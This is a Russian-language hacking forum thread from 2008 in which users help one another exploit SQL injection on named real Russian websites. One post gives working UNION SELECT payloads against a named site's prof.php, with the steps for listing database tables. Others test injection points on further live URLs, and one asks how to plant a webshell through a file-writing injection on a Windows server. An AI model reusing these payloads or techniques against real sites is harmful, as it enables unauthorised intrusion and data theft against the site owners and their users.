Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    в {} принтабельное поле из найденных (мог бы и сам догадаться)

    офф. сайт проги - http://dbattack.com/

    Любая авто-тулза работает только в так называемых ИДЕАЛЬНЫХ условиях sql-inj, поэтому предпочтительно всё делать ручками, по крайней мере на начальном этапе.
     
    1 person likes this.
  2. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    да нет, по-моему... к примеру, есть {2},4,5 - так вот как раз 4 и 5 это принтабельные поля.. ну во всяком случае у меня всегда это были принтабельные поля.. хз, может совпадало так.
    http://dbattack.com/ - уже черт знает сколько не работает.
     
  3. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Pashkela правильно сказал, просто ты его недопонял.

    {2},4,5 - принтабельные, а конкретно через 2-ое поле, прога будет выводить.
     
    1 person likes this.
  4. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    а, все, ясно спасибо ))
    Еще один вопрос по этой проге: если я вручную ввожу принтабельные поля, то обязательно их ВСЕ писать? или достаточно, например, ондного - то, через которое все выводится?
     
    #4344 Thrasher88, 28 Dec 2008
    Last edited: 28 Dec 2008
  5. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Достаточно и одного, главное - заключить поле в скобки.
     
  6. Sonar_

    Sonar_ New Member

    Joined:
    19 Dec 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Как получить голоса на Vkontakte.ru не платив за них?
     
  7. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    и как энтот вопрос относится к уязвимостям ??
    ну да, конечно возможно есть уязвимость на сайте через которую моно это делать.. но ты думаешь ктонить скажет ? :D тогда уж в раздел покупок пости тему ..
     
    1 person likes this.
  8. Thrasher88

    Thrasher88 Elder - Старейшина

    Joined:
    18 Apr 2008
    Messages:
    62
    Likes Received:
    13
    Reputations:
    0
    Подскажите, как обойти.. Нашел скулю:
    Подобрал через ORDER BY чило полей, их 3.
    Ввожу:
    Но все равно вылазит ошибка Warning: Invalid argument supplied for foreach() in /home/virtwww/w_myprof-ru_decef7ff/http/prof.php on line 14
     
  9. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    просто скажите это скуль?
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    да
     
    1 person likes this.
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    С чего ты взял?
    http://www.petarda.ru/default.asp?tmpl=1'
    http://www.petarda.ru/default.asp?tmpl=9999999
    http://www.petarda.ru/default.asp?tmpl=blablabla
    Выводит одинаковый резулбтак...
    Это MS SQL же?
    Если я не прав, то обьясните мне...
     
    1 person likes this.
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Вот и я так подумал...
     
  13. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    а что это?
     
  14. F4R

    F4R Banned

    Joined:
    20 Jun 2008
    Messages:
    224
    Likes Received:
    46
    Reputations:
    2
    а вот ещё!
    http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=&price_to=&orderby=price&ordertype=1%27

    пишет: "ошибка БД"

    уязвимость?
     
  15. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    F4R, нет.
     
  16. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    https://forum.antichat.ru/showpost.php?p=307103&postcount=1

    вообще говоря сортировка меняется
    но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет) ;)
     
    1 person likes this.
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    l1ght
    и что? как разкрутить http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','') там просто нужно закоментировать остальное и составить превельное началало запроса..
     
    #4357 sabe, 29 Dec 2008
    Last edited: 30 Dec 2008
    1 person likes this.
  18. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    2 Thrasher88
    Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
    Пробуем
    http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
    получилось.
    Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
    /prof.php?id=-1+union+select+TABLE_NAME,null,null+from+information_schema.tables--
    и вуаля таблички есть :)
    Дальше сам, я не рыл
     
    6 people like this.
  19. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    явахек?))

    логический вывод 5 ветка, что поделать?

    не подбор
     
    #4359 sabe, 30 Dec 2008
    Last edited: 30 Dec 2008
    1 person likes this.
  20. Napas

    Napas Member

    Joined:
    30 Nov 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    7
    проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
    и еще,когда записываешь в файл прибавляется такая фигня -

    202 537 9.pdf 22042 application/pdf 1
    1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
    [сюда_вставляется_все_что_я_записываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
    4 5 6
     
    1 person likes this.
Thread Status:
Not open for further replies.